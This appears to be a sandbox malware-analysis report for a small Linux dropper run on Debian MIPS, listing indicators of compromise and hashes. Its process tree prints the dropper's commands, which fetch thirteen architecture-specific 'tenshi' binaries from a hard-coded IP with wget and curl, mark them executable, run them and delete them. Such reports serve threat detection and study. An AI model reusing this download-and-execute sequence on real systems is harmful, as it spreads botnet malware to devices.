61fbf36df390dc9c79812fd86bf3c4efbc37533bc19b559c6379c615eba0d09b

Analysis

max time kernel
35s
max time network
37s
platform
debian-9_mips
resource
debian9-mipsbe-20240418-en
resource tags

arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
06/07/2024, 21:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

296a3c4f0b173217c609be610594274f_JaffaCakes118
Size

2KB
MD5

296a3c4f0b173217c609be610594274f
SHA1

62fe22125918753c6785043c45daef823b01f59f
SHA256

61fbf36df390dc9c79812fd86bf3c4efbc37533bc19b559c6379c615eba0d09b
SHA512

6350415f576e282262d4f99b2569725b04ca110fe4c4377c892cf80a7f0f87cd48bbeeaec4f713fc4a89961963a3cd2c24767caabf2104e5afe478f8bc0343e7

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/tenshimips	754	tenshimips
/tmp/tenshimipsel	762	tenshimipsel
/tmp/tenshish4	767	tenshish4
/tmp/tenshix86	772	tenshix86
/tmp/tenshiarm6	781	tenshiarm6
/tmp/tenshii686	798	tenshii686
/tmp/tenshippc	815	tenshippc
/tmp/tenshii586	836	tenshii586
/tmp/tenshim68k	842	tenshim68k
/tmp/tenshish	847	tenshish
/tmp/tenshifuck	858	tenshifuck
/tmp/tenshiapache2	877	tenshiapache2
/tmp/tenshitelnetd	891	tenshitelnetd

Reads runtime system information 13 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/tenshim68k	curl
File opened for modification	/tmp/tenshifuck	curl
File opened for modification	/tmp/tenshish4	curl
File opened for modification	/tmp/tenshippc	curl
File opened for modification	/tmp/tenshiapache2	curl
File opened for modification	/tmp/tenshix86	curl
File opened for modification	/tmp/tenshii686	curl
File opened for modification	/tmp/tenshiarm6	curl
File opened for modification	/tmp/tenshii586	curl
File opened for modification	/tmp/tenshish	curl
File opened for modification	/tmp/tenshitelnetd	curl
File opened for modification	/tmp/tenshimips	curl
File opened for modification	/tmp/tenshimipsel	curl

/tmp/296a3c4f0b173217c609be610594274f_JaffaCakes118
/tmp/296a3c4f0b173217c609be610594274f_JaffaCakes118
1⤵
PID:726
- /usr/bin/wget
  wget http://157.230.117.251/tenshimips
  2⤵
  PID:729
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshimips
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:741
- /bin/chmod
  chmod +x tenshimips
  2⤵
  PID:752
- /tmp/tenshimips
  ./tenshimips
  2⤵
  - Executes dropped EXE
  PID:754
- /bin/rm
  rm -rf tenshimips
  2⤵
  PID:756
- /usr/bin/wget
  wget http://157.230.117.251/tenshimipsel
  2⤵
  PID:757
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshimipsel
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:759
- /bin/chmod
  chmod +x tenshimipsel
  2⤵
  PID:761
- /tmp/tenshimipsel
  ./tenshimipsel
  2⤵
  - Executes dropped EXE
  PID:762
- /bin/rm
  rm -rf tenshimipsel
  2⤵
  PID:763
- /usr/bin/wget
  wget http://157.230.117.251/tenshish4
  2⤵
  PID:764
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshish4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:765
- /bin/chmod
  chmod +x tenshish4
  2⤵
  PID:766
- /tmp/tenshish4
  ./tenshish4
  2⤵
  - Executes dropped EXE
  PID:767
- /bin/rm
  rm -rf tenshish4
  2⤵
  PID:768
- /usr/bin/wget
  wget http://157.230.117.251/tenshix86
  2⤵
  PID:769
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshix86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:770
- /bin/chmod
  chmod +x tenshix86
  2⤵
  PID:771
- /tmp/tenshix86
  ./tenshix86
  2⤵
  - Executes dropped EXE
  PID:772
- /bin/rm
  rm -rf tenshix86
  2⤵
  PID:773
- /usr/bin/wget
  wget http://157.230.117.251/tenshiarm6
  2⤵
  PID:774
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshiarm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:775
- /bin/chmod
  chmod +x tenshiarm6
  2⤵
  PID:780
- /tmp/tenshiarm6
  ./tenshiarm6
  2⤵
  - Executes dropped EXE
  PID:781
- /bin/rm
  rm -rf tenshiarm6
  2⤵
  PID:783
- /usr/bin/wget
  wget http://157.230.117.251/tenshii686
  2⤵
  PID:784
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshii686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:789
- /bin/chmod
  chmod +x tenshii686
  2⤵
  PID:797
- /tmp/tenshii686
  ./tenshii686
  2⤵
  - Executes dropped EXE
  PID:798
- /bin/rm
  rm -rf tenshii686
  2⤵
  PID:800
- /usr/bin/wget
  wget http://157.230.117.251/tenshippc
  2⤵
  PID:801
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshippc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:807
- /bin/chmod
  chmod +x tenshippc
  2⤵
  PID:814
- /tmp/tenshippc
  ./tenshippc
  2⤵
  - Executes dropped EXE
  PID:815
- /bin/rm
  rm -rf tenshippc
  2⤵
  PID:817
- /usr/bin/wget
  wget http://157.230.117.251/tenshii586
  2⤵
  PID:818
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshii586
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:826
- /bin/chmod
  chmod +x tenshii586
  2⤵
  PID:834
- /tmp/tenshii586
  ./tenshii586
  2⤵
  - Executes dropped EXE
  PID:836
- /bin/rm
  rm -rf tenshii586
  2⤵
  PID:837
- /usr/bin/wget
  wget http://157.230.117.251/tenshim68k
  2⤵
  PID:838
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshim68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:840
- /bin/chmod
  chmod +x tenshim68k
  2⤵
  PID:841
- /tmp/tenshim68k
  ./tenshim68k
  2⤵
  - Executes dropped EXE
  PID:842
- /bin/rm
  rm -rf tenshim68k
  2⤵
  PID:843
- /usr/bin/wget
  wget http://157.230.117.251/tenshish
  2⤵
  PID:844
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshish
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:845
- /bin/chmod
  chmod +x tenshish
  2⤵
  PID:846
- /tmp/tenshish
  ./tenshish
  2⤵
  - Executes dropped EXE
  PID:847
- /bin/rm
  rm -rf tenshish
  2⤵
  PID:848
- /usr/bin/wget
  wget http://157.230.117.251/tenshifuck
  2⤵
  PID:849
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshifuck
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:850
- /bin/chmod
  chmod +x tenshifuck
  2⤵
  PID:856
- /tmp/tenshifuck
  ./tenshifuck
  2⤵
  - Executes dropped EXE
  PID:858
- /bin/rm
  rm -rf tenshifuck
  2⤵
  PID:859
- /usr/bin/wget
  wget http://157.230.117.251/tenshiapache2
  2⤵
  PID:861
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshiapache2
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:871
- /bin/chmod
  chmod +x tenshiapache2
  2⤵
  PID:875
- /tmp/tenshiapache2
  ./tenshiapache2
  2⤵
  - Executes dropped EXE
  PID:877
- /bin/rm
  rm -rf tenshiapache2
  2⤵
  PID:878
- /usr/bin/wget
  wget http://157.230.117.251/tenshitelnetd
  2⤵
  PID:880
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshitelnetd
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:884
- /bin/chmod
  chmod +x tenshitelnetd
  2⤵
  PID:890
- /tmp/tenshitelnetd
  ./tenshitelnetd
  2⤵
  - Executes dropped EXE
  PID:891
- /bin/rm
  rm -rf tenshitelnetd
  2⤵
  PID:892

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/tenshimips

Filesize
343B

MD5
01e9b3351a20632ce2de4a219637711c

SHA1
d46e0281e15a1ef4fec829351c47c0eacaf6ad5c

SHA256
b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2

SHA512
33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f

Download Submit